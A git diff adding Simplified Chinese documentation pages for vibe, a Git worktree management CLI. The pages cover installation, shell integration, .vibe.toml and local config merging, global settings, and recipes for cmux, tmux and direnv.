+```
+
+该命令会注册配置文件的 SHA-256 哈希值，以防止未经授权的修改。
+
+## 配置主题
+
+- [.vibe.toml](/zh/configuration/vibe-toml/) - 共享配置详解
+- [.vibe.local.toml](/zh/configuration/local-config/) - 本地覆盖配置
+- [settings.json](/zh/configuration/settings/) - 用户级全局设置
+- [钩子](/zh/configuration/hooks/) - 可用的钩子与环境变量

--- a/packages/docs/src/content/docs/zh/configuration/local-config.mdx
+++ b/packages/docs/src/content/docs/zh/configuration/local-config.mdx
@@ -1,0 +1,111 @@
+---
+title: .vibe.local.toml
+description: 个人本地配置覆盖
+sidebar:
+  order: 3
+---
+
+通过 `.vibe.local.toml` 文件，你可以用个人设置覆盖或扩展共享的 `.vibe.toml` 配置。该文件会自动被 gitignore。
+
+## 使用场景
+
+- 开发者专属的环境文件
+- 本地路径或凭据
+- 个人工作流定制
+- 特定机器的配置
+
+## 基本示例
+
+```toml
+# 用本地命令覆盖或扩展共享钩子
+[hooks]
+post_start_prepend = ["echo '本地设置开始'"]
+post_start_append = ["npm run dev"]
+
+# 覆盖需要复制的文件
+[copy]
+files = [".env.local", ".secrets"]
+```
+
+## 配置合并
+
+当 `.vibe.toml` 和 `.vibe.local.toml` 同时存在时，它们会按照以下规则合并：
+
+| 方式     | 语法                     | 说明                 |
+| -------- | ------------------------ | -------------------- |
+| 完全覆盖 | `字段名 = [...]`         | 完全替换共享的值     |
+| 前置追加 | `字段名_prepend = [...]` | 在共享值之前添加条目 |
+| 后置追加 | `字段名_append = [...]`  | 在共享值之后添加条目 |
+
+### 合并示例
+
+```toml
+# .vibe.toml（共享）
+[hooks]
+post_start = ["npm install", "npm run build"]
+
+# .vibe.local.toml（本地）
+[hooks]
+post_start_prepend = ["echo '本地设置'"]
+post_start_append = ["npm run dev"]
+
+# 结果: ["echo '本地设置'", "npm install", "npm run build", "npm run dev"]
+```
+
+### 覆盖示例
+
+要完全替换共享配置：
+
+```toml
+# .vibe.local.toml
+[hooks]
+post_start = ["my-custom-script.sh"]
+
+# 结果: ["my-custom-script.sh"]
+# （共享的 post_start 被完全替换）
+```
+
+## Worktree 路径覆盖
+
+你可以在 `.vibe.local.toml` 中覆盖 worktree 路径脚本：
+
+```toml
+# .vibe.local.toml
+[worktree]
+path_script = "./my-local-path-script.sh"
+```
+
+它的优先级高于 `.vibe.toml` 中的 `path_script`。
+
+## 信任注册
+
+与 `.vibe.toml` 一样，本地配置文件也必须经过信任注册：
+
+```bash
+vibe trust
+```
+
+该命令会同时信任 `.vibe.toml` 和 `.vibe.local.toml`（如果存在）。
+
+## 完整示例
+
+```toml
+# .vibe.local.toml
+
+[copy]
+# 追加仅本地使用的复制文件
+files = [".env.local", ".secrets", "local-config.json"]
+
+[hooks]
+# 在共享的 pre_start 钩子之前执行
+pre_start_prepend = ["echo '开始本地设置'"]
+
+# 在共享的 post_start 钩子之后执行
+post_start_append = [
+  "npm run dev",
+  "open http://localhost:3000"
+]
+
+# 完全覆盖 pre_clean
+pre_clean = ["echo '自定义清理'"]
+```

--- a/packages/docs/src/content/docs/zh/configuration/settings.mdx
+++ b/packages/docs/src/content/docs/zh/configuration/settings.mdx
@@ -1,0 +1,148 @@
+---
+title: settings.json
+description: 用户级全局设置
+sidebar:
+  order: 4
+---
+
+`settings.json` 文件包含保存在本地、不与团队共享的用户级设置。该文件位于 `~/.config/vibe/settings.json`。
+
+## 位置
+
+| 平台    | 路径                                       |
+| ------- | ------------------------------------------ |
+| macOS   | `~/.config/vibe/settings.json`             |
+| Linux   | `~/.config/vibe/settings.json`             |
+| Windows | `%USERPROFILE%\.config\vibe\settings.json` |
+
+## 配置项
+
+### 快速删除（Clean 性能）
+
+默认情况下，vibe 会使用快速删除策略：先将 worktree 目录移动到临时位置，再在后台异步删除。这使得即便是大型仓库，`vibe clean` 也能瞬间完成。
+
+```json
+{
+  "version": 3,
+  "clean": {
+    "fast_remove": true
+  }
+}
+```
+
+| 选项          | 默认值 | 说明                                |
+| ------------- | ------ | ----------------------------------- |
+| `fast_remove` | `true` | 使用快速异步删除（移动 + 后台删除） |
+
+**工作原理：**
+
+1. worktree 目录会被瞬间重命名为隐藏的 `.vibe-trash-*` 目录（O(1) 操作）
+2. 针对已清空的目录清理 git worktree 元数据
+3. 实际的文件删除在后台异步执行
+4. 之前遗留的 `.vibe-trash-*` 目录会被自动清理
+
+:::note
+如果快速重命名因任何原因失败，vibe 会自动回退到传统删除方式。
+:::
+
+### Worktree 路径脚本
+
+使用自定义脚本覆盖默认的 worktree 路径：
+
+```json
+{
+  "version": 3,
+  "worktree": {
+    "path_script": "~/.config/vibe/worktree-path.sh"
+  }
+}
+```
+
+:::tip
+该设置也可以在 `.vibe.toml` 中按仓库单独配置。`settings.json` 中的用户设置优先级更高。
+:::
+
+### 跳过哈希校验
+
+全局禁用哈希校验（不推荐）：
+
+```json
+{
+  "version": 3,
+  "skipHashCheck": true
+}
+```
+
+:::caution
+禁用哈希校验会降低安全性。请仅在充分理解风险的情况下使用。
+:::
+
+## JSON Schema
+
+vibe 提供了用于编辑器自动补全和校验的 JSON Schema。当 vibe 保存设置文件时，会**自动添加** `$schema` 属性：
+
+```json
+{
+  "$schema": "https://raw.githubusercontent.com/kexi/vibe/v0.10.0/schemas/settings.schema.json",
+  "version": 3,
+  "clean": {
+    "fast_remove": true
+  }
+}
+```
+
+Schema URL 中包含 vibe 的版本标签（例如 `v0.10.0`），以确保与你所安装的版本兼容。
+
+### Schema 版本管理
+
+:::note[Schema URL 的可用性]
+Schema URL 仅对**已发布的版本**可用。如果你使用的是开发版构建，在该版本正式发布之前，Schema URL 可能无法访问。
+:::
+
+**升级时的行为：**
+
+- 升级 vibe 后，`$schema` URL 会自动更新为对应的新版本
+- 旧的 Schema URL 在 GitHub 上依然可以访问，因此已有的设置文件仍能正常工作
+- Schema 在同一主版本内保持向后兼容
+
+### VS Code 设置
+
+只要存在 `$schema` 属性，VS Code 就会自动提供补全。如需手动配置，请在 VS Code 设置中添加：
+
+```json
+{
+  "json.schemas": [
+    {
+      "fileMatch": ["**/vibe/settings.json"],
+      "url": "https://raw.githubusercontent.com/kexi/vibe/v0.10.0/schemas/settings.schema.json"
+    }
+  ]
+}
+```
+
+请将 `v0.10.0` 替换为你已安装的 vibe 版本。
+
+## 完整示例
+
+```json
+{
+  "$schema": "https://raw.githubusercontent.com/kexi/vibe/v0.10.0/schemas/settings.schema.json",
+  "version": 3,
+  "skipHashCheck": false,
+  "worktree": {
+    "path_script": "~/.config/vibe/worktree-path.sh"
+  },
+  "clean": {
+    "fast_remove": true
+  },
+  "permissions": {
+    "allow": [],
+    "deny": []
+  }
+}
+```
+
+## 相关内容
+
+- [.vibe.toml](/zh/configuration/vibe-toml/) - 团队共享配置
+- [clean](/zh/commands/clean/) - 包含 fast_remove 详情的 clean 命令

--- a/packages/docs/src/content/docs/zh/configuration/vibe-toml.mdx
+++ b/packages/docs/src/content/docs/zh/configuration/vibe-toml.mdx
@@ -1,0 +1,202 @@
+---
+title: .vibe.toml
+description: 团队共享的配置文件
+sidebar:
+  order: 2
+---
+
+import { Badge } from "@astrojs/starlight/components";
+
+`.vibe.toml` 文件包含共享配置，通常会提交到 git 并与团队成员共享。
+
+## Copy 配置
+
+### 文件
+
+将源仓库中的单个文件复制到 worktree：
+
+```toml
+[copy]
+files = [".env", "config.json"]
+```
+
+#### Glob 模式
+
+`files` 数组支持 glob 模式，可以灵活地选择文件：
+
+```toml
+[copy]
+files = [
+  "*.env",              # 根目录下的所有 .env 文件
+  "**/*.json",          # 所有 JSON 文件（递归）
+  "config/*.txt",       # config/ 下的所有 .txt 文件
+  ".env.production"     # 精确路径依然可用
+]
+```
+
+**支持的模式：**
+
+| 模式    | 说明                            |
+| ------- | ------------------------------- |
+| `*`     | 匹配除 `/` 以外的任意字符       |
+| `**`    | 匹配包含 `/` 的任意字符（递归） |
+| `?`     | 匹配任意单个字符                |
+| `[abc]` | 匹配方括号内的任意字符          |
+
+:::tip[性能]
+递归模式（`**/*`）在大型仓库中可能较慢。请尽量使用更具体的模式（例如用 `config/**/*.json` 代替 `**/*.json`）。
+:::
+
+### 目录 <Badge text="v0.4.0+" />
+
+递归复制整个目录：
+
+```toml
+[copy]
+dirs = [
+  "node_modules",      # 精确的目录路径
+  ".cache",            # 隐藏目录
+  "packages/*"         # 匹配多个目录的 Glob 模式
+]
+```
+
+:::note
+
+- 目录会被完整复制（而非增量同步）
+- 像 `node_modules` 这样的大目录可能需要较长的复制时间
+- 复制匹配到的文件时会保留目录结构
+  :::
+
+### 并发数 <Badge text="v0.17.0+" />
+
+控制并行执行的目录复制操作数量：
+
+```toml
+[copy]
+concurrency = 8
+```
+
+- **默认值**：`4`
+- **取值范围**：`1` 到 `32`
+- 在存储速度较快的系统（NVMe、SSD）上，提高该值可以加快复制
+- 降低该值可以减少系统资源占用
+
+**通过环境变量覆盖：**
+
+```bash
+VIBE_COPY_CONCURRENCY=16 vibe start feat/my-feature
+```
+
+环境变量的优先级高于配置文件中的设置。
+
+## 复制性能优化 <Badge text="v0.4.0+" />
+
+vibe 会根据你的系统自动选择最佳的复制策略：
+
+| 策略             | 使用场景                    | 平台        |
+| ---------------- | --------------------------- | ----------- |
+| Clone (CoW)      | APFS 上的目录复制           | macOS       |
+| Clone (reflink)  | Btrfs/XFS 上的目录复制      | Linux       |
+| rsync            | 无法使用 clone 时的目录复制 | macOS/Linux |
+| robocopy (`/MT`) | 目录复制                    | Windows     |
+| Standard         | 文件复制，或作为兜底方案    | 全部        |
+
+**工作原理：**
+
+- **文件复制**：始终使用原生的 `copyFile()`，以获得最佳的单文件性能
+- **目录复制**：自动使用当前可用的最快方式
+
+**优势：**
+
+- Copy-on-Write 只复制元数据而非实际数据，因此速度极快
+- 无需配置 - 最佳策略会被自动检测
+- 自动回退机制确保复制始终可用
+
+## 钩子配置
+
+关于 pre/post 钩子的配置细节，请参阅[钩子](/zh/configuration/hooks/)。
+
+## 子模块配置
+
+在 worktree 创建之后、父仓库的 `pre_start` 钩子执行之前，加载所选直接子模块中已信任的 `.vibe.toml` 文件：
+
+```toml
+[submodules]
+configs = ["libs/foo", "vendor/bar"]
+```
+
+- **默认值**：`[]`
+- 每一项都必须与 `.gitmodules` 中某个直接子模块的路径完全匹配
+- 会在新的 worktree 中执行 `git submodule update --init -- <paths>`
+- 使用各子模块自身的 trust entry 加载其 `.vibe.toml` / `.vibe.local.toml`
+- 子模块配置中的钩子和 copy 规则会以子模块根目录为基准解析路径并执行
+- `--no-hooks` 会跳过子模块的钩子，但不会跳过子模块的初始化
+- `--no-copy` 会跳过子模块的 copy 规则
+- 子模块更新、trust、路径校验或 setup 失败都会中断 `vibe start`，已创建的 worktree 会保留下来以便排查
+
+## Worktree 配置 <Badge text="v0.6.0+" />
+
+使用外部脚本自定义 worktree 的目录路径。
+
+### path_script
+
+指定一个输出 worktree 路径的脚本：
+
+```toml
+[worktree]
+path_script = "~/.config/vibe/worktree-path.sh"
+```
+
+脚本会接收到以下环境变量：
+
+| 变量                    | 说明                          | 示例               |
+| ----------------------- | ----------------------------- | ------------------ |
+| `VIBE_REPO_NAME`        | 仓库名称                      | `my-project`       |
+| `VIBE_BRANCH_NAME`      | 分支名称                      | `feat/new-feature` |
+| `VIBE_SANITIZED_BRANCH` | 净化后的分支名称（`/` → `-`） | `feat-new-feature` |
+| `VIBE_REPO_ROOT`        | 仓库根目录路径                | `/path/to/repo`    |
+
+**脚本示例：**
+
+```bash
+#!/bin/bash
+# ~/.config/vibe/worktree-path.sh
+echo "${HOME}/worktrees/${VIBE_REPO_NAME}-${VIBE_SANITIZED_BRANCH}"
+```
+
+:::note
+脚本必须向标准输出打印一个**绝对路径**。
+:::
+
+## 完整示例
+
+```toml
+[copy]
+files = [
+  ".env",
+  ".env.local",
+  "**/*.secret"
+]
+dirs = [
+  "node_modules",
+  ".cache",
+  "vendor"
+]
+concurrency = 8
+
+[hooks]
+pre_start = ["echo '正在准备 worktree...'"]
+post_start = [
+  "pnpm install",
+  "pnpm db:migrate",
+  "pnpm build"
+]
+pre_clean = ["git stash"]
+post_clean = ["echo '清理完成'"]
+
+[submodules]
+configs = ["libs/foo"]
+
+[worktree]
+path_script = "~/.config/vibe/worktree-path.sh"
+```

--- a/packages/docs/src/content/docs/zh/getting-started.mdx
+++ b/packages/docs/src/content/docs/zh/getting-started.mdx
@@ -1,0 +1,234 @@
+---
+title: 快速开始
+description: 几分钟内上手 vibe
+---
+
+## 什么是 vibe？
+
+vibe 是一个简化 Git Worktree 管理的命令行工具。它可以帮助你：
+
+- 无需离开主仓库即可为新功能创建 worktree
+- 自动复制配置文件和依赖
+- 在创建或清理 worktree 时运行配置钩子
+- 通过交互式提示安全地管理 worktree 的生命周期
+
+## 快速开始
+
+### 1. 安装 vibe
+
+import { Tabs, TabItem } from "@astrojs/starlight/components";
+
+<Tabs>
+  <TabItem label="Homebrew">
+    ```bash frame="terminal"
+    brew install kexi/tap/vibe
+    ```
+  </TabItem>
+  <TabItem label="npm/npx">
+    ```bash frame="terminal"
+    # 全局安装
+    npm install -g @kexi/vibe
+
+    # 或使用 npx 直接运行
+    npx @kexi/vibe start feat/my-feature
+    ```
+    :::note
+    需要进行 shell 设置（步骤 2）。使用 npx 时，请选择「npx」对应的选项。
+    :::
+    :::tip
+    如果经常使用，推荐全局安装。npx 因为要解析软件包，启动会比较慢。
+    :::
+
+  </TabItem>
+  <TabItem label="Bun">
+    ```bash frame="terminal"
+    # 全局安装
+    bun add -g @kexi/vibe
+
+    # 或使用 bunx 直接运行
+    bunx @kexi/vibe start feat/my-feature
+    ```
+    :::note
+    需要进行 shell 设置（步骤 2）。使用 bunx 时，请选择「bunx」对应的选项。
+    :::
+    :::tip
+    如果经常使用，推荐全局安装。bunx 因为要解析软件包，启动会比较慢。
+    :::
+
+  </TabItem>
+  <TabItem label="Linux">
+    ```bash frame="terminal"
+    # Ubuntu/Debian (x64)
+    curl -LO https://github.com/kexi/vibe/releases/latest/download/vibe_amd64.deb
+    sudo apt install ./vibe_amd64.deb
+
+    # 其他发行版 (x64)
+    curl -L https://github.com/kexi/vibe/releases/latest/download/vibe-linux-x64 -o vibe
+    chmod +x vibe && sudo mv vibe /usr/local/bin/
+    ```
+
+  </TabItem>
+  <TabItem label="Windows">
+    ```bash frame="terminal"
+    npm install -g @kexi/vibe
+    ```
+
+    Windows x64 通过 `@kexi/vibe-win32-x64` 二进制软件包获得支持。WSL2 用户也可以使用上面的 Linux 安装方法。
+
+  </TabItem>
+</Tabs>
+
+### 2. 设置你的 shell
+
+请根据你的安装方式，将以下内容中的**其中一项**添加到 shell 配置文件中：
+
+<Tabs>
+  <TabItem label="Zsh">
+    ```bash frame="terminal"
+    # 添加到 ~/.zshrc（任选其一）
+
+    # 用于全局安装（Homebrew、npm -g、bun -g）
+    vibe() { eval "$(command vibe "$@")" }
+
+    # 用于 npx（未全局安装）
+    vibe() { eval "$(npx @kexi/vibe "$@")" }
+    # 或用于 bunx：
+    # vibe() { eval "$(bunx @kexi/vibe "$@")" }
+    ```
+
+  </TabItem>
+  <TabItem label="Bash">
+    ```bash frame="terminal"
+    # 添加到 ~/.bashrc（任选其一）
+
+    # 用于全局安装（Homebrew、npm -g、bun -g）
+    vibe() { eval "$(command vibe "$@")"; }
+
+    # 用于 npx（未全局安装）
+    vibe() { eval "$(npx @kexi/vibe "$@")"; }
+    # 或用于 bunx：
+    # vibe() { eval "$(bunx @kexi/vibe "$@")"; }
+    ```
+
+  </TabItem>
+  <TabItem label="Fish">
+    ```fish frame="terminal"
+    # 添加到 ~/.config/fish/config.fish（任选其一）
+
+    # 用于全局安装（Homebrew、npm -g、bun -g）
+    function vibe
+        eval (command vibe $argv)
+    end
+
+    # 用于 npx（未全局安装）
+    function vibe
+        eval (npx @kexi/vibe $argv)
+    end
+    # 或用于 bunx：
+    # function vibe
+    #     eval (bunx @kexi/vibe $argv)
+    # end
+    ```
+
+  </TabItem>
+  <TabItem label="Nushell">
+    ```nu frame="terminal"
+    # 添加到 ~/.config/nushell/config.nu（任选其一）
+
+    # 用于全局安装（Homebrew、npm -g、bun -g）
+    def --env --wrapped vibe [...args] {
+        let out = (^vibe --eval-dialect nu ...$args)
+        for line in ($out | lines) {
+            if ($line | str starts-with "__VIBE_CD__") {
+                cd ($line | str replace "__VIBE_CD__" "")
+            } else {
+                print $line
+            }
+        }
+    }
+
+    # 用于 npx（未全局安装）
+    def --env --wrapped vibe [...args] {
+        let out = (npx @kexi/vibe --eval-dialect nu ...$args)
+        for line in ($out | lines) {
+            if ($line | str starts-with "__VIBE_CD__") {
+                cd ($line | str replace "__VIBE_CD__" "")
+            } else {
+                print $line
+            }
+        }
+    }
+    # 或用于 bunx：
+    # def --env --wrapped vibe [...args] {
+    #     let out = (bunx @kexi/vibe --eval-dialect nu ...$args)
+    #     for line in ($out | lines) {
+    #         if ($line | str starts-with "__VIBE_CD__") {
+    #             cd ($line | str replace "__VIBE_CD__" "")
+    #         } else {
+    #             print $line
+    #         }
+    #     }
+    # }
+    ```
+
+    :::note
+    需要 vibe 2.2.0 或更高版本，以及 nushell 0.83 或更高版本。请替换掉你之前粘贴的旧
+    `nu -c` 代码片段 —— 它实际上从未改变过你的目录，并且会拒绝任何带标志的命令。请同时保留
+    `--wrapped`（让标志能传递到 `...args`）和 `for`（nushell 会丢弃在 `each` 闭包内所做的
+    环境变更）。
+    :::
+
+  </TabItem>
+  <TabItem label="PowerShell">
+    ```powershell frame="terminal"
+    # 添加到你的 $PROFILE（任选其一）
+
+    # 用于全局安装（Homebrew、npm -g、bun -g）
+    function vibe { $out = & vibe.exe --eval-dialect powershell @args; if ($out) { Invoke-Expression ($out -join "`n") } }
+
+    # 用于 npx（未全局安装）
+    function vibe { $out = & npx @kexi/vibe --eval-dialect powershell @args; if ($out) { Invoke-Expression ($out -join "`n") } }
+    # 或用于 bunx：
+    # function vibe { $out = & bunx @kexi/vibe --eval-dialect powershell @args; if ($out) { Invoke-Expression ($out -join "`n") } }
+    ```
+
+    :::note
+    需要 vibe 2.2.0 或更高版本。请替换掉你之前粘贴的旧
+    `Invoke-Expression (& vibe.exe $args)` 代码片段 —— 它无法正确处理包含单引号的路径，
+    并且在 vibe 没有产生任何输出时会抛出错误。
+    :::
+
+  </TabItem>
+</Tabs>
+
+### 3. 创建你的第一个 worktree
+
+```bash frame="terminal"
+# 开始开发一个新功能
+vibe start feat/my-new-feature
+
+# 你的终端现在已经位于新的 worktree 中了！
+# 进行修改、提交、推送等操作。
+
+# 完成后，清理该 worktree
+vibe clean
+```
+
+## 基本工作流
+
+```
+主仓库
+     │
+     ├── vibe start feat/feature-a  →  repo-feat-feature-a/
+     │                                      │
+     │                                      └── (开发功能)
+     │
+     └── vibe clean  ←─────────────────────────┘
+           (返回主仓库并删除 worktree)
+```
+
+## 下一步
+
+- [安装](/zh/installation/) - 详细的安装说明
+- [Shell 设置](/zh/setup/) - 配置你的 shell
+- [配置](/zh/configuration/) - 设置 `.vibe.toml`

--- a/packages/docs/src/content/docs/zh/index.mdx
+++ b/packages/docs/src/content/docs/zh/index.mdx
@@ -1,0 +1,62 @@
+---
+title: 欢迎使用 vibe
+description: 轻松管理 Git Worktree 的命令行工具
+template: splash
+hero:
+  tagline: 轻松管理 Git Worktree。创建、切换、清理，一气呵成。
+  actions:
+    - text: 快速开始
+      link: /zh/getting-started/
+      icon: right-arrow
+    - text: 在 GitHub 上查看
+      link: https://github.com/kexi/vibe
+      icon: external
+      variant: minimal
+---
+
+import { Card, CardGrid } from "@astrojs/starlight/components";
+
+## 演示
+
+<div style="width: 100%; max-width: 800px; margin: 0 auto 2rem;">
+  <img
+    src="/demo.gif"
+    alt="vibe 演示"
+    style="width: 100%; border-radius: 8px;"
+  />
+</div>
+
+## 特性
+
+<CardGrid stagger>
+  <Card title="简单的命令" icon="terminal">
+    只有两个主要命令：`vibe start` 创建 worktree，`vibe clean` 删除它。
+  </Card>
+  <Card title="幂等的操作" icon="approve-check">
+    多次运行 `vibe start` 也很安全 —— 它会妥善处理已存在的 worktree。
+  </Card>
+  <Card title="自动化配置" icon="setting">
+    通过 `.vibe.toml` 自动复制文件、运行钩子并配置你的开发环境。
+  </Card>
+  <Card title="安全优先" icon="warning">
+    SHA-256 哈希校验可防止配置文件被未经授权地修改。
+  </Card>
+</CardGrid>
+
+## 快速开始
+
+```bash
+# 通过 Homebrew 安装（macOS）
+brew install kexi/tap/vibe
+
+# 设置 shell 集成（添加到 ~/.zshrc）
+vibe() { eval "$(command vibe "$@")" }
+
+# 为新功能创建一个 worktree
+vibe start feat/new-feature
+
+# 完成后进行清理
+vibe clean
+```
+
+> **注意：** 使用其他 shell？请参阅[快速开始](/zh/getting-started/#2-设置你的-shell)指南，了解 Bash、Fish、Nushell 和 PowerShell 的设置方法。

--- a/packages/docs/src/content/docs/zh/installation.mdx
+++ b/packages/docs/src/content/docs/zh/installation.mdx
@@ -1,0 +1,171 @@
+---
+title: 安装
+description: 在你的系统上安装 vibe
+---
+
+import { Tabs, TabItem } from "@astrojs/starlight/components";
+
+## 包管理器
+
+<Tabs>
+  <TabItem label="Homebrew (macOS)">
+    ```bash frame="terminal"
+    brew install kexi/tap/vibe
+    ```
+  </TabItem>
+  <TabItem label="npm (Node.js)">
+    ```bash frame="terminal"
+    # 全局安装
+    npm install -g @kexi/vibe
+
+    # 或使用 npx 直接运行
+    npx @kexi/vibe start feat/my-feature
+    ```
+
+    :::note
+    `@kexi/vibe` 只是一个轻量启动器。安装时，npm 会通过 `optionalDependencies` 拉取与当前平台匹配的软件包（`@kexi/vibe-<platform>-<arch>`），并运行其中附带的 Rust 二进制文件。写时复制（Copy-on-Write）文件克隆（macOS APFS、Linux Btrfs/XFS）已内置在该二进制文件中。
+    :::
+
+  </TabItem>
+  <TabItem label="Bun">
+    ```bash frame="terminal"
+    # 全局安装
+    bun add -g @kexi/vibe
+
+    # 或使用 bunx 直接运行
+    bunx @kexi/vibe start feat/my-feature
+    ```
+
+    :::note
+    需要 Bun 1.2.0 或更高版本。`@kexi/vibe` 只是一个轻量启动器：它会通过 `optionalDependencies` 拉取与当前平台匹配的软件包（`@kexi/vibe-<platform>-<arch>`），并运行其中附带的 Rust 二进制文件。写时复制（Copy-on-Write）文件克隆（macOS APFS、Linux Btrfs/XFS）已内置在该二进制文件中。
+    :::
+
+  </TabItem>
+  <TabItem label="mise">
+    添加到你的 `.mise.toml`：
+
+    ```toml
+    [plugins]
+    vibe = "https://github.com/kexi/mise-vibe"
+
+    [tools]
+    vibe = "latest"
+    ```
+
+    然后运行：
+
+    ```bash frame="terminal"
+    mise install
+    ```
+
+    :::tip
+    通过 mise hooks 使用 `vibe shell-setup`，可以跳过[手动 shell 设置](/zh/setup/)。
+    详情请参阅[自动配置](/zh/setup/#使用-mise自动配置)。
+    :::
+
+  </TabItem>
+  <TabItem label="Nix">
+    ```bash frame="terminal"
+    # 直接运行（临时）
+    nix run github:kexi/vibe -- start feat/my-feature
+
+    # 持久化安装
+    nix profile install github:kexi/vibe
+    ```
+
+    对于 NixOS 或 Home Manager，可将其添加为 flake input：
+
+    ```nix
+    {
+      inputs.vibe.url = "github:kexi/vibe";
+
+      # 然后在你的配置中使用：
+      # environment.systemPackages = [ inputs.vibe.packages.${system}.default ];
+    }
+    ```
+
+    :::note
+    默认软件包（`packages.default` / `.#fromSource`）为了可复现性会从源码构建。
+    如果你更希望使用预编译的发行版二进制文件（跳过编译，并通过 SHA-256 哈希校验），
+    请使用 `packages.binary`：
+
+    ```bash frame="terminal"
+    nix run github:kexi/vibe#binary -- start feat/my-feature
+    ```
+    :::
+
+  </TabItem>
+</Tabs>
+
+## Linux
+
+:::note
+WSL2 用户可以根据自己的发行版，使用下面的 Linux 安装方法。
+:::
+
+<Tabs>
+  <TabItem label="Ubuntu/Debian">
+    ```bash frame="terminal"
+    # x64
+    curl -LO https://github.com/kexi/vibe/releases/latest/download/vibe_amd64.deb
+    sudo apt install ./vibe_amd64.deb
+
+    # ARM64
+    curl -LO https://github.com/kexi/vibe/releases/latest/download/vibe_arm64.deb
+    sudo apt install ./vibe_arm64.deb
+
+    # 卸载
+    sudo apt remove vibe
+    ```
+
+    该软件包会将其许可证文档安装到 `/usr/share/doc/vibe/` 目录下：
+    `copyright`（vibe 自身的 MIT 许可条款，采用 Debian 的机器可读 DEP-5 格式）
+    和 `THIRD-PARTY-LICENSES.md`（静态链接进该二进制文件的 Rust crate 的许可声明）。
+
+  </TabItem>
+  <TabItem label="其他发行版">
+    ```bash frame="terminal"
+    # x64
+    curl -L https://github.com/kexi/vibe/releases/latest/download/vibe-linux-x64 -o vibe
+    chmod +x vibe
+    sudo mv vibe /usr/local/bin/
+
+    # ARM64
+    curl -L https://github.com/kexi/vibe/releases/latest/download/vibe-linux-arm64 -o vibe
+    chmod +x vibe
+    sudo mv vibe /usr/local/bin/
+    ```
+
+  </TabItem>
+</Tabs>
+
+## Windows
+
+vibe 支持 Windows（x64）。通过 npm 安装即可 —— `@kexi/vibe` 启动器会拉取适用于你所在平台的 `@kexi/vibe-win32-x64` 二进制软件包：
+
+```bash frame="terminal"
+npm install -g @kexi/vibe
+```
+
+:::note
+Windows 上无法使用写时复制（CoW）克隆；创建 worktree 时，vibe 会回退为标准的文件复制。除此之外的一切（命令、标志、信任模型）与 Linux 和 macOS 上完全相同。
+:::
+
+:::tip
+你也可以在 [WSL2](https://learn.microsoft.com/windows/wsl/) 下按照上面的 [Linux](#linux) 说明运行 vibe —— 如果你希望在 Btrfs 卷上使用写时复制，这会很有用 —— 或者使用 Rust 工具链[从源码构建](#从源码构建)。
+:::
+
+## 从源码构建
+
+在安装了 [Rust 工具链](https://rustup.rs/)之后，你可以从源码构建二进制文件：
+
+```bash frame="terminal"
+git clone https://github.com/kexi/vibe.git
+cd vibe
+cargo build --manifest-path rust/Cargo.toml -p vibe --release
+# 二进制文件会输出到 rust/target/release/vibe
+```
+
+## 下一步
+
+安装完成后，请[设置你的 shell](/zh/setup/)以启用 vibe 的目录切换功能。

--- a/packages/docs/src/content/docs/zh/recipes/cmux.mdx
+++ b/packages/docs/src/content/docs/zh/recipes/cmux.mdx
@@ -1,0 +1,20 @@
+---
+title: cmux
+description: 在新的 worktree 中打开一个 cmux 工作区
+sidebar:
+  order: 2
+---
+
+打开一个指向刚刚创建的 worktree 的新 [cmux](https://github.com/kexi/cmux) 工作区。
+
+```toml
+[hooks]
+post_start = ['cmux new-workspace --cwd "$VIBE_WORKTREE_PATH"']
+```
+
+就是这么简单——每次执行 `vibe start` 都会把 worktree 路径交给 cmux。
+
+## 注意事项
+
+- `post_start` 是在新的 worktree **内部**执行的，因此 `--cwd "$VIBE_WORKTREE_PATH"` 严格来说是多余的，但保留它可以在你日后把该命令移到其他钩子阶段时保持语义明确。
+- 如果在非交互式 shell 的 `PATH` 中找不到 cmux，请使用绝对路径：`'/usr/local/bin/cmux new-workspace --cwd "$VIBE_WORKTREE_PATH"'`。

--- a/packages/docs/src/content/docs/zh/recipes/direnv.mdx
+++ b/packages/docs/src/content/docs/zh/recipes/direnv.mdx
@@ -1,0 +1,22 @@
+---
+title: direnv
+description: 在新的 worktree 中自动允许 .envrc
+sidebar:
+  order: 4
+---
+
+如果你的项目使用 [direnv](https://direnv.net)，并且会把 `.envrc` 复制到 worktree 中，那么在你执行 `direnv allow` 之前 direnv 会一直阻止加载。可以将这一步自动化：
+
+```toml
+[copy]
+files = [".envrc"]
+
+[hooks]
+post_start = ['direnv allow .']
+```
+
+`post_start` 是在新的 worktree 内部执行的，所以只写一个 `.` 就足够了。
+
+:::caution
+`direnv allow` 会以完整的 shell 权限执行 `.envrc`。请仅在你信任所检出分支上每一个提交的仓库中启用它。
+:::

--- a/packages/docs/src/content/docs/zh/recipes/index.mdx
+++ b/packages/docs/src/content/docs/zh/recipes/index.mdx
@@ -1,0 +1,21 @@
+---
+title: 实用配方
+description: 将 vibe 与其他工具集成的简短可复制代码片段
+sidebar:
+  order: 1
+---
+
+这里收集了一批极简的 `.vibe.toml` 代码片段，用于满足「我还想让 vibe 顺便做 X」这类常见的工作流需求。
+
+每个配方都刻意保持精简——只有一两行 TOML，可以直接粘贴到你现有的配置中。完整的钩子参考请见[钩子](/zh/configuration/hooks/)。
+
+## 内容一览
+
+- [cmux](/zh/recipes/cmux/) — 在新的 worktree 中打开一个 cmux 工作区
+- [tmux](/zh/recipes/tmux/) — 把 tmux 窗格分割到新的 worktree
+- [direnv](/zh/recipes/direnv/) — 对新的 worktree 自动执行 `direnv allow`
+- [WSL2 + btrfs](/zh/recipes/wsl2-btrfs/) — 通过挂载 btrfs 卷在 WSL2 中启用真正的 CoW 复制
+
+:::tip
+这些配方只使用有文档记载的环境变量（`VIBE_WORKTREE_PATH`、`VIBE_ORIGIN_PATH`）和 `sh` 兼容语法，因此在 macOS 和 Linux 上都可以开箱即用。
+:::

--- a/packages/docs/src/content/docs/zh/recipes/tmux.mdx
+++ b/packages/docs/src/content/docs/zh/recipes/tmux.mdx
@@ -1,0 +1,31 @@
+---
+title: tmux
+description: 把 tmux 窗格分割到新的 worktree
+sidebar:
+  order: 3
+---
+
+将当前的 tmux 窗口水平分割，并在新 worktree 的目录中打开。
+
+```toml
+[hooks]
+post_start = ['[ -n "$TMUX" ] && tmux split-window -h -c "$VIBE_WORKTREE_PATH"']
+```
+
+`[ -n "$TMUX" ] &&` 这个保护条件使得在 tmux 之外执行 `vibe start` 时该钩子不做任何事，因此同一份配置在任何环境下都能正常工作。
+
+## 变体
+
+打开新窗口而不是分割窗格：
+
+```toml
+[hooks]
+post_start = ['[ -n "$TMUX" ] && tmux new-window -c "$VIBE_WORKTREE_PATH"']
+```
+
